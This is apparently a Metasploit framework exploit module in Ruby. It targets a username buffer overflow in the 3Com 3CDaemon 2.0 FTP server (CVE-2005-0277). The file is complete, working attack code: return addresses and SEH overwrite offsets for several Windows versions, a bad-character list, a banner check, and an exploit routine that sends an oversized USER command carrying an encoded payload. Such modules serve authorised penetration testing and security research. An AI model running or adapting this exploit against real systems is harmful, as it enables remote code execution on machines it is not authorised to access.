1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Exploit::Remote
7
  Rank = AverageRanking
8

9
  include Msf::Exploit::Remote::Ftp
10
  include Msf::Exploit::Remote::Seh
11

12
  def initialize(info = {})
13
    super(
14
      update_info(
15
        info,
16
        'Name' => '3Com 3CDaemon 2.0 FTP Username Overflow',
17
        'Description' => %q{
18
          This module exploits a vulnerability in the 3Com 3CDaemon
19
          FTP service. This package is being distributed from the 3Com
20
          web site and is recommended in numerous support documents.
21
          This module uses the USER command to trigger the overflow.
22
        },
23
        'Author' => [
24
          'hdm', # Original author
25
          'otr' # Windows XP SP3
26
        ],
27
        'License' => MSF_LICENSE,
28
        'References' => [
29
          [ 'CVE', '2005-0277'],
30
          [ 'OSVDB', '12810'],
31
          [ 'OSVDB', '12811'],
32
          [ 'BID', '12155']
33
        ],
34
        'DefaultOptions' => {
35
          'EXITFUNC' => 'seh',
36
          'target' => 0
37
        },
38
        'Privileged' => false,
39
        'Payload' => {
40
          'Space' => 674,
41
          'BadChars' => "\x00~+&=%\x3a\x22\x0a\x0d\x20\x2f\x5c\x2e\x09",
42
          'StackAdjustment' => -3500,
43
          'Compat' =>
44
                        {
45
                          'ConnectionType' => '-find'
46
                        }
47
        },
48
        'Targets' => [
49
          [
50
            'Windows 2000 English', # Tested OK - hdm 11/24/2005
51
            {
52
              'Platform' => 'win',
53
              'Ret' => 0x75022ac4, # ws2help.dll
54
              'Offset' => 229
55
            },
56
          ],
57
          [
58
            'Windows XP English SP0/SP1',
59
            {
60
              'Platform' => 'win',
61
              'Ret' => 0x71aa32ad, # ws2help.dll
62
              'Offset' => 229
63
            },
64
          ],
65
          [
66
            'Windows NT 4.0 SP4/SP5/SP6',
67
            {
68
              'Platform' => 'win',
69
              'Ret' => 0x77681799, # ws2help.dll
70
              'Offset' => 229
71
            },
72
          ],
73
          [
74
            'Windows 2000 Pro SP4 French',
75
            {
76
              'Platform' => 'win',
77
              'Ret' => 0x775F29D0,
78
              'Offset' => 229
79
            },
80
          ],
81
          [
82
            'Windows XP English SP3',
83
            {
84
              'Platform' => 'win',
85
              'Ret' => 0x7CBD41FB, # 7CBD41FB JMP ESP shell32.data SP3
86
              # 'Ret'      => 0x775C2C1F,   # 775C2C1F JMP ESP shell32.data SP1
87
              'Offset' => 245
88
            },
89
          ],
90
        ],
91
        'DisclosureDate' => '2005-01-04',
92
        'Notes' => {
93
          'Reliability' => UNKNOWN_RELIABILITY,
94
          'Stability' => UNKNOWN_STABILITY,
95
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
96
        }
97
      )
98
    )
99
  end
100

101
  def check
102
    connect
103
    disconnect
104
    if (banner =~ /3Com 3CDaemon FTP Server Version 2\.0/)
105
      return Exploit::CheckCode::Appears
106
    end
107

108
    return Exploit::CheckCode::Safe
109
  end
110

111
  def exploit
112
    connect
113

114
    print_status("Trying target #{target.name}...")
115

116
    if (target == targets[4])
117
      buf = rand_text_english(target['Offset'], payload_badchars)
118
      buf << [ target['Ret'] ].pack('V') * 2
119
      buf << payload.encoded
120
    else
121
      buf = rand_text_english(2048, payload_badchars)
122
      seh = generate_seh_payload(target.ret)
123
      buf[target['Offset'], seh.length] = seh
124
    end
125

126
    send_cmd(['USER', buf], false)
127

128
    handler
129
    disconnect
130
  end
131
end
132

133